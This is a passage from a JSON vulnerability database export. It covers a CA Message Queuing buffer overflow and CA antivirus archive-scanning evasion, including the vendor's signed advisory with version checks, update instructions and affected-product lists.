},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-0060"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-0060"
},
{
"trust": 0.4,
"url": "http://iss.net/threats/272.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/474602"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5586/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5581/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5585/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5580/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5595/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5587/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5594/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5591/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5583/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5576/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1682/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5577/"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5590/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89943"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3206/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5588/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5578/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5579/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2622/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/26190/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo89945"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5593/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5597/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-0060"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35527"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-s"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/32234"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-07-26T00:00:00",
"db": "VULHUB",
"id": "VHN-23422"
},
{
"date": "2007-07-24T00:00:00",
"db": "BID",
"id": "25051"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"date": "2007-07-26T04:26:32",
"db": "PACKETSTORM",
"id": "58028"
},
{
"date": "2007-07-25T04:52:10",
"db": "PACKETSTORM",
"id": "58025"
},
{
"date": "2007-07-26T00:30:00",
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"date": "2007-07-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-23422"
},
{
"date": "2007-07-27T15:35:00",
"db": "BID",
"id": "25051"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"date": "2021-04-14T15:46:28.003000",
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Used in products Message Queuing Server Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.6
}
}
VAR-200901-0282
Vulnerability from variot - Updated: 2023-12-18 12:46Multiple unspecified vulnerabilities in the Arclib library (arclib.dll) before 7.3.0.15 in the CA Anti-Virus engine for CA Anti-Virus for the Enterprise 7.1, r8, and r8.1; Anti-Virus 2007 v8 and 2008; Internet Security Suite 2007 v3 and 2008; and other CA products allow remote attackers to bypass virus detection via a malformed archive file. Computer Associates Anti-Virus engine is prone to multiple vulnerabilities that may allow certain compressed archives to bypass the scan engine. Successful exploits will allow attackers to distribute files containing malicious code that the antivirus engine will fail to detect. Products with 'arclib.dll' prior to version 7.3.0.15 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
CA Advisory Reference: CA20090126-01
CA Advisory Date: 2009-01-26
Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG
Impact: A remote attacker can evade detection. CA has released a new Anti-Virus engine to address the vulnerabilities. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine.
Mitigating Factors: See note above.
Severity: CA has given these vulnerabilities a Low risk rating. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
How to determine if you are affected:
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
File Name File Version arclib.dll 7.3.0.15
*For eTrust Intrusion Detection 2.0 the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib.
Example compver utility output: ------------------------------------------------ COMPONENT NAME VERSION ------------------------------------------------ eTrust Antivirus Arclib Archive Library 7.3.0.15 ... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name Solaris libarclib.so Linux libarclib.so Mac OS X arclib.bundle
Workaround: Do not open email attachments or download files from untrusted sources.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777 82
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.9.1 (Build 287) Charset: utf-8
wj8DBQFJfyMKeSWR3+KUGYURAkyRAJ94Db9OT0mSDBo8UiSAK7AWWt5XSgCfc89J SlKLxRwfw06DmTk2tmlcrJI= =Kjse -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200901-0282",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "threat manager for the enterprise",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"model": "anti-virus sdk",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.1"
},
{
"model": "threat manager for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r12.0_nil_"
},
{
"model": "arcserve client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r6.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"model": "internet security suite 2007",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3"
},
{
"model": "anti-spyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r7"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"model": "anti-spyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.5_nil_"
},
{
"model": "anti-spyware 2007",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-spyware 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-spyware for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2007"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r7"
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates etrust antivirus r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust antivirus r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for linux",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve for windows server component",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates arcserve client agent for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates arcserve",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-spyware for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-spyware for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
}
],
"sources": [
{
"db": "BID",
"id": "33464"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002620"
},
{
"db": "NVD",
"id": "CVE-2009-0042"
},
{
"db": "CNNVD",
"id": "CNNVD-200901-407"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_plus_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-spyware:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-spyware_for_the_enterprise:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:2.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:r7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager_for_the_enterprise:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:network_and_systems_management:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2007:3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager_for_the_enterprise:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.1:_nil_:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5_nil_:windows:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:3.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_intrusion_detection:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r12.0_nil_:windows:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.1:_nil_:linux:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-spyware_for_the_enterprise:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2007:8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:secure_content_manager:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-spyware:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5_nil_:linux:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:arcserve_client_agent:-:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:r8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:r6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
